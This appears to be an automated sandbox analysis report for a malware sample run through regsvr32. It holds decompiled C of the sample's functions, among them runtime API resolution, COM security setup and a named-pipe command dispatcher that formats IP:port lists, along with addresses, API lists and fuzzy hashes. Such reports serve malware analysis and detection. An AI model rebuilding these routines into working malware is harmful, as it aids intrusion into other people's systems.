                                                                                                                                                                                              0x04b04007
                                                                                                                                                                                              0x04b04010
                                                                                                                                                                                              0x04b04013
                                                                                                                                                                                              0x04b04017
                                                                                                                                                                                              0x04b04019
                                                                                                                                                                                              0x04b04026
                                                                                                                                                                                              0x04b0403a
                                                                                                                                                                                              0x04b04049
                                                                                                                                                                                              0x04b0405a
                                                                                                                                                                                              0x04b04023
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04023
                                                                                                                                                                                              0x04b0405c
                                                                                                                                                                                              0x04b04060
                                                                                                                                                                                              0x04b04065
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04065
                                                                                                                                                                                              0x04b04070
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04072
                                                                                                                                                                                              0x04b04076
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04078
                                                                                                                                                                                              0x04b03e9c
                                                                                                                                                                                              0x04b03ea5
                                                                                                                                                                                              0x04b03eb3
                                                                                                                                                                                              0x04b03eb6
                                                                                                                                                                                              0x04b03ed3
                                                                                                                                                                                              0x04b03eda
                                                                                                                                                                                              0x04b03eec
                                                                                                                                                                                              0x04b03eec
                                                                                                                                                                                              0x04b03ef3
                                                                                                                                                                                              0x04b03f03
                                                                                                                                                                                              0x04b03f1b
                                                                                                                                                                                              0x04b03f05
                                                                                                                                                                                              0x04b03f0d
                                                                                                                                                                                              0x04b03f0d
                                                                                                                                                                                              0x04b03f1e
                                                                                                                                                                                              0x04b03f22
                                                                                                                                                                                              0x04b03f32
                                                                                                                                                                                              0x04b03f55
                                                                                                                                                                                              0x04b03f67
                                                                                                                                                                                              0x04b03f34
                                                                                                                                                                                              0x04b03f48
                                                                                                                                                                                              0x04b03f48
                                                                                                                                                                                              0x04b03f71
                                                                                                                                                                                              0x04b03f8d
                                                                                                                                                                                              0x04b03f73
                                                                                                                                                                                              0x04b03f82
                                                                                                                                                                                              0x04b03f82
                                                                                                                                                                                              0x04b03f95
                                                                                                                                                                                              0x04b03f9e
                                                                                                                                                                                              0x04b03f9e
                                                                                                                                                                                              0x04b03fac
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03ef5
                                                                                                                                                                                              0x04b03ef7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03ef7
                                                                                                                                                                                              0x04b03ef3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03eb6
                                                                                                                                                                                              0x04b03d99
                                                                                                                                                                                              0x04b03da7
                                                                                                                                                                                              0x04b03dac
                                                                                                                                                                                              0x04b03db7
                                                                                                                                                                                              0x04b03dba
                                                                                                                                                                                              0x04b03dbe
                                                                                                                                                                                              0x04b03dc0
                                                                                                                                                                                              0x04b03dd0
                                                                                                                                                                                              0x04b03dd9
                                                                                                                                                                                              0x04b03de2
                                                                                                                                                                                              0x04b03dea
                                                                                                                                                                                              0x04b03df3
                                                                                                                                                                                              0x04b03dfe
                                                                                                                                                                                              0x04b03e04
                                                                                                                                                                                              0x04b03e07
                                                                                                                                                                                              0x04b03e0a
                                                                                                                                                                                              0x04b03e11
                                                                                                                                                                                              0x04b03e18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b03e23
                                                                                                                                                                                              0x04b03e31
                                                                                                                                                                                              0x04b03e3c
                                                                                                                                                                                              0x04b03e46
                                                                                                                                                                                              0x04b03e5e
                                                                                                                                                                                              0x04b03e6b
                                                                                                                                                                                              0x04b03e6b
                                                                                                                                                                                              0x04b03e48
                                                                                                                                                                                              0x04b03e53
                                                                                                                                                                                              0x04b03e53
                                                                                                                                                                                              0x04b03e72
                                                                                                                                                                                              0x04b03e72
                                                                                                                                                                                              0x04b03e7a
                                                                                                                                                                                              0x04b03e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 04B03ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 04B03EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04B03F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04B03F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 04B04052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: 0ab9375d0e0be7d7c4dbac88b34460595d6ea538ab35257e0aba848ba2b1dcd1
                                                                                                                                                                                              • Instruction ID: 12a23c712f0568105367221513c0b3995b4f6d049b1e1d5936390650d9daa469
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ab9375d0e0be7d7c4dbac88b34460595d6ea538ab35257e0aba848ba2b1dcd1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E18274E00209DFDB14CFA8C984AADBBF1FF48355F148599E915EB391E734A981CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B019A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 15f3e2dac8f53c387b16bbc9cdbc5021c763a2e027e2a6dc39b8e69e0f8da536
                                                                                                                                                                                              • Instruction ID: 84b1092b1f2d8cb57967d436804e174ba9b806c79f0a0c229c51e85efdb0e5e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f3e2dac8f53c387b16bbc9cdbc5021c763a2e027e2a6dc39b8e69e0f8da536
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41F571700205A7EB2C4EAC9D99BBE3E58DF41316F18C1D5F912E62D1F363F9628291
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFE400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E04AFE400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x4b0c868, 0, 1, 0x4b0c878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E04AF8BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                              0x04afe40d
                                                                                                                                                                                              0x04afe410
                                                                                                                                                                                              0x04afe413
                                                                                                                                                                                              0x04afe424
                                                                                                                                                                                              0x04afe42a
                                                                                                                                                                                              0x04afe43b
                                                                                                                                                                                              0x04afe443
                                                                                                                                                                                              0x04afe494
                                                                                                                                                                                              0x04afe494
                                                                                                                                                                                              0x04afe499
                                                                                                                                                                                              0x04afe49e
                                                                                                                                                                                              0x04afe49e
                                                                                                                                                                                              0x04afe4a1
                                                                                                                                                                                              0x04afe4a6
                                                                                                                                                                                              0x04afe4ab
                                                                                                                                                                                              0x04afe4ab
                                                                                                                                                                                              0x04afe4ae
                                                                                                                                                                                              0x04afe445
                                                                                                                                                                                              0x04afe446
                                                                                                                                                                                              0x04afe44c
                                                                                                                                                                                              0x04afe45d
                                                                                                                                                                                              0x04afe462
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afe464
                                                                                                                                                                                              0x04afe471
                                                                                                                                                                                              0x04afe479
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afe47b
                                                                                                                                                                                              0x04afe47d
                                                                                                                                                                                              0x04afe485
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afe487
                                                                                                                                                                                              0x04afe48a
                                                                                                                                                                                              0x04afe490
                                                                                                                                                                                              0x04afe490
                                                                                                                                                                                              0x04afe485
                                                                                                                                                                                              0x04afe479
                                                                                                                                                                                              0x04afe462
                                                                                                                                                                                              0x04afe4b3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE424
                                                                                                                                                                                              • CoCreateInstance.OLE32(04B0C868,00000000,00000001,04B0C878,?,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE471
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: d6db5c06ec06a913cecfedcbec8e15ad1537c8cae881d01ac1d374c9d71d35a5
                                                                                                                                                                                              • Instruction ID: 9f6ac03d8ddbdf1282c3661f44247826a4acf24410e36988a90c94fd6429544b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6db5c06ec06a913cecfedcbec8e15ad1537c8cae881d01ac1d374c9d71d35a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D210970700245BFDB249BA6CC4DE6BBF7CEFC6B16F10419DB605A72A1D675AA40CA30
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B03379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E04B03379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L04B034D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E04B03352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E04AF8CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x4b01b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                                              0x04b03379
                                                                                                                                                                                              0x04b0337c
                                                                                                                                                                                              0x04b03381
                                                                                                                                                                                              0x04b03385
                                                                                                                                                                                              0x04b03385
                                                                                                                                                                                              0x04b0338b
                                                                                                                                                                                              0x04b0338f
                                                                                                                                                                                              0x04b03390
                                                                                                                                                                                              0x04b03393
                                                                                                                                                                                              0x04b03394
                                                                                                                                                                                              0x04b03399
                                                                                                                                                                                              0x04b0339c
                                                                                                                                                                                              0x04b0339d
                                                                                                                                                                                              0x04b033a2
                                                                                                                                                                                              0x04b033a9
                                                                                                                                                                                              0x04b03432
                                                                                                                                                                                              0x04b03432
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b033b4
                                                                                                                                                                                              0x04b033b5
                                                                                                                                                                                              0x04b033c7
                                                                                                                                                                                              0x04b033ed
                                                                                                                                                                                              0x04b033ed
                                                                                                                                                                                              0x04b033f6
                                                                                                                                                                                              0x04b033f8
                                                                                                                                                                                              0x04b033fe
                                                                                                                                                                                              0x04b0342d
                                                                                                                                                                                              0x04b0342d
                                                                                                                                                                                              0x04b03435
                                                                                                                                                                                              0x04b03438
                                                                                                                                                                                              0x04b03438
                                                                                                                                                                                              0x04b03400
                                                                                                                                                                                              0x04b03401
                                                                                                                                                                                              0x04b03407
                                                                                                                                                                                              0x04b03409
                                                                                                                                                                                              0x04b03409
                                                                                                                                                                                              0x04b0340e
                                                                                                                                                                                              0x04b0340d
                                                                                                                                                                                              0x04b0340d
                                                                                                                                                                                              0x04b03415
                                                                                                                                                                                              0x04b03421
                                                                                                                                                                                              0x04b0342b
                                                                                                                                                                                              0x04b0342b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b033d7
                                                                                                                                                                                              0x04b033d7
                                                                                                                                                                                              0x04b033d7
                                                                                                                                                                                              0x04b033dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b033df
                                                                                                                                                                                              0x04b033e5
                                                                                                                                                                                              0x04b033ea
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b033ea
                                                                                                                                                                                              0x04b033c7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 53bea87bb11a31a4ead5ff2714c37641b363e5f78d5a345385e234f468d9b086
                                                                                                                                                                                              • Instruction ID: d505d21bb438b08be5059bae18076ce51d96674c861c647e336baa3f081fb012
                                                                                                                                                                                              • Opcode Fuzzy Hash: 53bea87bb11a31a4ead5ff2714c37641b363e5f78d5a345385e234f468d9b086
                                                                                                                                                                                              • Instruction Fuzzy Hash: 452135626446152AEB225E9CDC89F9E3FC8EF01366F58E495FD409E1C0E7A1F9414390
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E04AF377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x4b0f818; // 0x4c2f8b0
					_push(0);
					_push( *0x4b0f804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x4b0f818; // 0x4c2f8b0
					_push(0x80000);
					_push( *0x4b0f8bc);
					_push( *0x4b0f804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x4b0f8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E04B00962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E04AFD1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x4b0f804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E04AF171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E04AF8BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E04AFD1A6(_t188);
									L52:
									E04AF8BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E04AFA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E04AFD1A6(_t189);
									E04AF8BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E04AFA43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E04AFA43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E04AFA43D(_t203) + _t203;
										__eflags = _t110;
										E04AF9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E04AF171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E04AF8BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E04B00962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E04AF9B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x4b0f8bc; // 0x0
								E04AF9EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E04AF1DD3(E04AF9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E04AF8BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E04AF1DD3(E04AF9F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E04AF9C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E04AF9880( *((intOrPtr*)(_t200 + _t148 * 4)), E04AFA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E04AF5EC3(E04AFD1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E04B00940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E04B00940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                                              0x04af377f
                                                                                                                                                                                              0x04af3785
                                                                                                                                                                                              0x04af3790
                                                                                                                                                                                              0x04af3794
                                                                                                                                                                                              0x04af3798
                                                                                                                                                                                              0x04af3798
                                                                                                                                                                                              0x04af379d
                                                                                                                                                                                              0x04af379e
                                                                                                                                                                                              0x04af37a4
                                                                                                                                                                                              0x04af37b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af37c3
                                                                                                                                                                                              0x04af37c8
                                                                                                                                                                                              0x04af37c9
                                                                                                                                                                                              0x04af37ce
                                                                                                                                                                                              0x04af37d3
                                                                                                                                                                                              0x04af37d9
                                                                                                                                                                                              0x04af37e7
                                                                                                                                                                                              0x04af3af7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af37f8
                                                                                                                                                                                              0x04af37f8
                                                                                                                                                                                              0x04af37fe
                                                                                                                                                                                              0x04af3801
                                                                                                                                                                                              0x04af3804
                                                                                                                                                                                              0x04af3976
                                                                                                                                                                                              0x04af3976
                                                                                                                                                                                              0x04af3979
                                                                                                                                                                                              0x04af3aed
                                                                                                                                                                                              0x04af3833
                                                                                                                                                                                              0x04af3834
                                                                                                                                                                                              0x04af3838
                                                                                                                                                                                              0x04af3838
                                                                                                                                                                                              0x04af383a
                                                                                                                                                                                              0x04af383a
                                                                                                                                                                                              0x04af383b
                                                                                                                                                                                              0x04af395a
                                                                                                                                                                                              0x04af395a
                                                                                                                                                                                              0x04af395b
                                                                                                                                                                                              0x04af3960
                                                                                                                                                                                              0x04af3afd
                                                                                                                                                                                              0x04af3b03
                                                                                                                                                                                              0x04af3b0e
                                                                                                                                                                                              0x04af3b10
                                                                                                                                                                                              0x04af3b11
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3b11
                                                                                                                                                                                              0x04af3980
                                                                                                                                                                                              0x04af3980
                                                                                                                                                                                              0x04af3983
                                                                                                                                                                                              0x04af39c8
                                                                                                                                                                                              0x04af39cc
                                                                                                                                                                                              0x04af39d1
                                                                                                                                                                                              0x04af39d5
                                                                                                                                                                                              0x04af39d7
                                                                                                                                                                                              0x04af3ad8
                                                                                                                                                                                              0x04af3ade
                                                                                                                                                                                              0x04af3ae2
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3859
                                                                                                                                                                                              0x04af39dd
                                                                                                                                                                                              0x04af39e1
                                                                                                                                                                                              0x04af39e5
                                                                                                                                                                                              0x04af39ee
                                                                                                                                                                                              0x04af39f0
                                                                                                                                                                                              0x04af39f5
                                                                                                                                                                                              0x04af39f7
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3ab2
                                                                                                                                                                                              0x04af3abb
                                                                                                                                                                                              0x04af3abd
                                                                                                                                                                                              0x04af3ac0
                                                                                                                                                                                              0x04af3ac1
                                                                                                                                                                                              0x04af3ac8
                                                                                                                                                                                              0x04af3ace
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3ace
                                                                                                                                                                                              0x04af39fd
                                                                                                                                                                                              0x04af39ff
                                                                                                                                                                                              0x04af3a01
                                                                                                                                                                                              0x04af3a90
                                                                                                                                                                                              0x04af3a97
                                                                                                                                                                                              0x04af3a98
                                                                                                                                                                                              0x04af3a9b
                                                                                                                                                                                              0x04af3a9c
                                                                                                                                                                                              0x04af3aa8
                                                                                                                                                                                              0x04af3aad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3aad
                                                                                                                                                                                              0x04af3a0b
                                                                                                                                                                                              0x04af3a0b
                                                                                                                                                                                              0x04af3a0e
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3a14
                                                                                                                                                                                              0x04af3a19
                                                                                                                                                                                              0x04af3a1b
                                                                                                                                                                                              0x04af3a1e
                                                                                                                                                                                              0x04af3a24
                                                                                                                                                                                              0x04af3a28
                                                                                                                                                                                              0x04af3a28
                                                                                                                                                                                              0x04af3a1b
                                                                                                                                                                                              0x04af3a2e
                                                                                                                                                                                              0x04af3a30
                                                                                                                                                                                              0x04af3a34
                                                                                                                                                                                              0x04af3a36
                                                                                                                                                                                              0x04af3a39
                                                                                                                                                                                              0x04af3a40
                                                                                                                                                                                              0x04af3a49
                                                                                                                                                                                              0x04af3a4f
                                                                                                                                                                                              0x04af3a54
                                                                                                                                                                                              0x04af3a5d
                                                                                                                                                                                              0x04af3a75
                                                                                                                                                                                              0x04af3a75
                                                                                                                                                                                              0x04af3a78
                                                                                                                                                                                              0x04af3a7d
                                                                                                                                                                                              0x04af3a81
                                                                                                                                                                                              0x04af3a81
                                                                                                                                                                                              0x04af3a84
                                                                                                                                                                                              0x04af3a85
                                                                                                                                                                                              0x04af3a88
                                                                                                                                                                                              0x04af3a8c
                                                                                                                                                                                              0x04af3a8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3a12
                                                                                                                                                                                              0x04af3985
                                                                                                                                                                                              0x04af3988
